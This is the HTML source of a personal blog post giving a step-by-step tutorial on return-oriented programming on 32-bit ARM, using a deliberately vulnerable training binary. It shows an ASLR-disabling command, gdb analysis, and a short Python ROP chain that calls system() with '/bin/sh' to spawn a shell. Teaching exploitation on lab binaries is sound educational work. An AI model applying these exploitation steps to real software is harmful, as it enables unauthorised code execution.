all repos — site @ 90a7ba87a11c4d6a2c79a11c5f8f6f27fb4731a8

source for my site, found at icyphox.sh

build/blog/rop-on-arm/index.html (view raw)

  1<!DOCTYPE html>
  2<html lang=en>
  3<link rel="stylesheet" href="/static/style.css" type="text/css">
  4<link rel="stylesheet" href="/static/syntax.css" type="text/css">
  5<link rel="shortcut icon" type="images/x-icon" href="/static/favicon.ico">
  6<meta name="description" content="Making stack-based exploitation great again!">
  7<meta name="viewport" content="initial-scale=1">
  8<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  9<meta content="#021012" name="theme-color">
 10<meta name="HandheldFriendly" content="true">
 11<meta name="twitter:card" content="summary_large_image">
 12<meta name="twitter:site" content="@icyphox">
 13<meta name="twitter:title" content="Return Oriented Programming on ARM (32-bit)">
 14<meta name="twitter:description" content="Making stack-based exploitation great again!">
 15<meta name="twitter:image" content="/static/icyphox.png">
 16<meta property="og:title" content="Return Oriented Programming on ARM (32-bit)">
 17<meta property="og:type" content="website">
 18<meta property="og:description" content="Making stack-based exploitation great again!">
 19<meta property="og:url" content="https://icyphox.sh">
 20<meta property="og:image" content="/static/icyphox.png">
 21<html>
 22  <title>
 23    Return Oriented Programming on ARM (32-bit)
 24  </title>
 25<script src="//instant.page/1.1.0" type="module" integrity="sha384-EwBObn5QAxP8f09iemwAJljc+sU+eUXeL9vSBw1eNmVarwhKk2F9vBEpaN9rsrtp"></script>
 26<div class="container-text">
 27  <header class="header">
 28    
 29        <a href="/blog">blog</a>
 30        <a href="/reading">reading log</a>
 31        <a href="/about">about</a>
 32        <a href="https://twitter.com/icyphox">twitter</a>
 33
 34  </header>
 35<body> 
 36   <div class="content">
 37    <div align="left">
 38      <p> 05 June, 2019 </p>
 39      <h1 id="return-oriented-programming-on-arm-32-bit">Return Oriented Programming on ARM (32-bit)</h1>
 40
 41<h2 id="making-stack-based-exploitation-great-again">Making stack-based exploitation great again!</h2>
 42
 43<p>Before we start <em>anything</em>, you’re expected to know the basics of ARM
 44assembly to follow along. I highly recommend
 45<a href="https://twitter.com/fox0x01">Azeria’s</a> series on <a href="https://azeria-labs.com/writing-arm-assembly-part-1/">ARM Assembly
 46Basics</a>. Once you’re
 47comfortable with it, proceed with the next bit — environment setup.</p>
 48
 49<h3 id="setup">Setup</h3>
 50
 51<p>Since we’re working with the ARM architecture, there are two options to go
 52forth with: </p>
 53
 54<ol>
 55<li>Emulate — head over to <a href="https://www.qemu.org/download/">qemu.org/download</a> and install QEMU. 
 56And then download and extract the ARMv6 Debian Stretch image from one of the links <a href="https://blahcat.github.io/qemu/">here</a>.
 57The scripts found inside should be self-explanatory.</li>
 58<li>Use actual ARM hardware, like an RPi.</li>
 59</ol>
 60
 61<p>For debugging and disassembling, we’ll be using plain old <code>gdb</code>, but you
 62may use <code>radare2</code>, IDA or anything else, really. All of which can be
 63trivially installed.</p>
 64
 65<p>And for the sake of simplicity, disable ASLR:</p>
 66
 67<div class="codehilite"><pre><span></span><code>$ <span class="nb">echo</span> <span class="m">0</span> &gt; /proc/sys/kernel/randomize_va_space
 68</code></pre></div>
 69
 70<p>Finally, the binary we’ll be using in this exercise is <a href="https://twitter.com/bellis1000">Billy Ellis’</a>
 71<a href="/static/files/roplevel2.c">roplevel2</a>. </p>
 72
 73<p>Compile it:</p>
 74
 75<div class="codehilite"><pre><span></span><code>$ gcc roplevel2.c -o rop2
 76</code></pre></div>
 77
 78<p>With that out of the way, here’s a quick run down of what ROP actually is.</p>
 79
 80<h3 id="a-primer-on-rop">A primer on ROP</h3>
 81
 82<p>ROP or Return Oriented Programming is a modern exploitation technique that’s
 83used to bypass protections like the <strong>NX bit</strong> (no-execute bit) and <strong>code sigining</strong>.
 84In essence, no code in the binary is actually modified and the entire exploit
 85is crafted out of pre-existing artifacts within the binary, known as <strong>gadgets</strong>.</p>
 86
 87<p>A gadget is essentially a small sequence of code (instructions), ending with
 88a <code>ret</code>, or a return instruction. In our case, since we’re dealing with ARM
 89code, there is no <code>ret</code> instruction but rather a <code>pop {pc}</code> or a <code>bx lr</code>.
 90These gadgets are <em>chained</em> together by jumping (returning) from one onto the other
 91to form what’s called as a <strong>ropchain</strong>. At the end of a ropchain,
 92there’s generally a call to <code>system()</code>, to acheive code execution.</p>
 93
 94<p>In practice, the process of executing a ropchain is something like this:</p>
 95
 96<ul>
 97<li>confirm the existence of a stack-based buffer overflow</li>
 98<li>identify the offset at which the instruction pointer gets overwritten</li>
 99<li>locate the addresses of the gadgets you wish to use</li>
100<li>craft your input keeping in mind the stack’s layout, and chain the addresses
101of your gadgets</li>
102</ul>
103
104<p><a href="https://twitter.com/LiveOverflow">LiveOverflow</a> has a <a href="https://www.youtube.com/watch?v=zaQVNM3or7k&amp;list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN&amp;index=46&amp;t=0s">beautiful video</a> where he explains ROP using “weird machines”. 
105Check it out, it might be just what you needed for that “aha!” moment :)</p>
106
107<p>Still don’t get it? Don’t fret, we’ll look at <em>actual</em> exploit code in a bit and hopefully
108that should put things into perspective.</p>
109
110<h3 id="exploring-our-binary">Exploring our binary</h3>
111
112<p>Start by running it, and entering any arbitrary string. On entering a fairly
113large string, say, “A” × 20, we
114see a segmentation fault occur.</p>
115
116<p><img src="/static/img/string_segfault.png" alt="string and segfault" /></p>
117
118<p>Now, open it up in <code>gdb</code> and look at the functions inside it.</p>
119
120<p><img src="/static/img/gdb_functions.png" alt="gdb functions" /></p>
121
122<p>There are three functions that are of importance here, <code>main</code>, <code>winner</code> and 
123<code>gadget</code>. Disassembling the <code>main</code> function:</p>
124
125<p><img src="/static/img/gdb_main_disas.png" alt="gdb main disassembly" /></p>
126
127<p>We see a buffer of 16 bytes being created (<code>sub sp, sp, #16</code>), and some calls
128to <code>puts()</code>/<code>printf()</code> and <code>scanf()</code>. Looks like <code>winner</code> and <code>gadget</code> are 
129never actually called.</p>
130
131<p>Disassembling the <code>gadget</code> function:</p>
132
133<p><img src="/static/img/gdb_gadget_disas.png" alt="gdb gadget disassembly" /></p>
134
135<p>This is fairly simple, the stack is being initialized by <code>push</code>ing <code>{r11}</code>,
136which is also the frame pointer (<code>fp</code>). What’s interesting is the <code>pop {r0, pc}</code>
137instruction in the middle. This is a <strong>gadget</strong>.</p>
138
139<p>We can use this to control what goes into <code>r0</code> and <code>pc</code>. Unlike in x86 where
140arguments to functions are passed on the stack, in ARM the registers <code>r0</code> to <code>r3</code>
141are used for this. So this gadget effectively allows us to pass arguments to
142functions using <code>r0</code>, and subsequently jumping to them by passing its address
143in <code>pc</code>. Neat.</p>
144
145<p>Moving on to the disassembly of the <code>winner</code> function:</p>
146
147<p><img src="/static/img/gdb_disas_winner.png" alt="gdb winner disassembly" /></p>
148
149<p>Here, we see a calls to <code>puts()</code>, <code>system()</code> and finally, <code>exit()</code>.
150So our end goal here is to, quite obviously, execute code via the <code>system()</code>
151function.</p>
152
153<p>Now that we have an overview of what’s in the binary, let’s formulate a method
154of exploitation by messing around with inputs.</p>
155
156<h3 id="messing-around-with-inputs">Messing around with inputs :^)</h3>
157
158<p>Back to <code>gdb</code>, hit <code>r</code> to run and pass in a patterned input, like in the
159screenshot.</p>
160
161<p><img src="/static/img/gdb_info_reg_segfault.png" alt="gdb info reg post segfault" /></p>
162
163<p>We hit a segfault because of invalid memory at address <code>0x46464646</code>. Notice
164the <code>pc</code> has been overwritten with our input.
165So we smashed the stack alright, but more importantly, it’s at the letter ‘F’.</p>
166
167<p>Since we know the offset at which the <code>pc</code> gets overwritten, we can now
168control program execution flow. Let’s try jumping to the <code>winner</code> function.</p>
169
170<p>Disassemble <code>winner</code> again using <code>disas winner</code> and note down the offset
171of the second instruction — <code>add r11, sp, #4</code>. 
172For this, we’ll use Python to print our input string replacing <code>FFFF</code> with
173the address of <code>winner</code>. Note the endianness.</p>
174
175<div class="codehilite"><pre><span></span><code>$ python -c <span class="s1">&#39;print(&quot;AAAABBBBCCCCDDDDEEEE\x28\x05\x01\x00&quot;)&#39;</span> <span class="p">|</span> ./rop2
176</code></pre></div>
177
178<p><img src="/static/img/python_winner_jump.png" alt="jump to winner" /></p>
179
180<p>The reason we don’t jump to the first instruction is because we want to control the stack
181ourselves. If we allow <code>push {rll, lr}</code> (first instruction) to occur, the program will <code>pop</code>
182those out after <code>winner</code> is done executing and we will no longer control 
183where it jumps to.</p>
184
185<p>So that didn’t do much, just prints out a string “Nothing much here&#8230;”. 
186But it <em>does</em> however, contain <code>system()</code>. Which somehow needs to be populated with an argument
187to do what we want (run a command, execute a shell, etc.).</p>
188
189<p>To do that, we’ll follow a multi-step process: </p>
190
191<ol>
192<li>Jump to the address of <code>gadget</code>, again the 2nd instruction. This will <code>pop</code> <code>r0</code> and <code>pc</code>.</li>
193<li>Push our command to be executed, say “<code>/bin/sh</code>” onto the stack. This will go into
194<code>r0</code>.</li>
195<li>Then, push the address of <code>system()</code>. And this will go into <code>pc</code>.</li>
196</ol>
197
198<p>The pseudo-code is something like this:</p>
199
200<pre><code>string = AAAABBBBCCCCDDDDEEEE
201gadget = # addr of gadget
202binsh  = # addr of /bin/sh
203system = # addr of system()
204
205print(string + gadget + binsh + system)
206</code></pre>
207
208<p>Clean and mean.</p>
209
210<h3 id="the-exploit">The exploit</h3>
211
212<p>To write the exploit, we’ll use Python and the absolute godsend of a library — <code>struct</code>.
213It allows us to pack the bytes of addresses to the endianness of our choice.
214It probably does a lot more, but who cares.</p>
215
216<p>Let’s start by fetching the address of <code>/bin/sh</code>. In <code>gdb</code>, set a breakpoint
217at <code>main</code>, hit <code>r</code> to run, and search the entire address space for the string “<code>/bin/sh</code>”:</p>
218
219<pre><code>(gdb) find &amp;system, +9999999, "/bin/sh"
220</code></pre>
221
222<p><img src="/static/img/gdb_find_binsh.png" alt="gdb finding /bin/sh" /></p>
223
224<p>One hit at <code>0xb6f85588</code>. The addresses of <code>gadget</code> and <code>system()</code> can be
225found from the disassmblies from earlier. Here’s the final exploit code:</p>
226
227<div class="codehilite"><pre><span></span><code><span class="kn">import</span> <span class="nn">struct</span>
228
229<span class="n">binsh</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">&quot;I&quot;</span><span class="p">,</span> <span class="mh">0xb6f85588</span><span class="p">)</span>
230<span class="n">string</span> <span class="o">=</span> <span class="s2">&quot;AAAABBBBCCCCDDDDEEEE&quot;</span>
231<span class="n">gadget</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">&quot;I&quot;</span><span class="p">,</span> <span class="mh">0x00010550</span><span class="p">)</span>
232<span class="n">system</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">&quot;I&quot;</span><span class="p">,</span> <span class="mh">0x00010538</span><span class="p">)</span>
233
234<span class="k">print</span><span class="p">(</span><span class="n">string</span> <span class="o">+</span> <span class="n">gadget</span> <span class="o">+</span> <span class="n">binsh</span> <span class="o">+</span> <span class="n">system</span><span class="p">)</span>
235</code></pre></div>
236
237<p>Honestly, not too far off from our pseudo-code :)</p>
238
239<p>Let’s see it in action:</p>
240
241<p><img src="/static/img/the_shell.png" alt="the shell!" /></p>
242
243<p>Notice that it doesn’t work the first time, and this is because <code>/bin/sh</code> terminates
244when the pipe closes, since there’s no input coming in from STDIN.
245To get around this, we use <code>cat(1)</code> which allows us to relay input through it
246to the shell. Nifty trick.</p>
247
248<h3 id="conclusion">Conclusion</h3>
249
250<p>This was a fairly basic challenge, with everything laid out conveniently. 
251Actual ropchaining is a little more involved, with a lot more gadgets to be chained
252to acheive code execution.</p>
253
254<p>Hopefully, I’ll get around to writing about heap exploitation on ARM too. That’s all for now.</p>
255 
256    </div>
257    <hr />
258    <p class="muted">Questions or comments? Open an issue at <a href="https://github.com/icyphox/site">this repo</a>, or send an email to <a href="mailto:icyph0x@pm.me">icyph0x@pm.me</a>.</p>
259    <footer>
260      <img src="https://licensebuttons.net/p/zero/1.0/80x15.png">
261    </footer>
262  </body>
263  </div>
264 </html>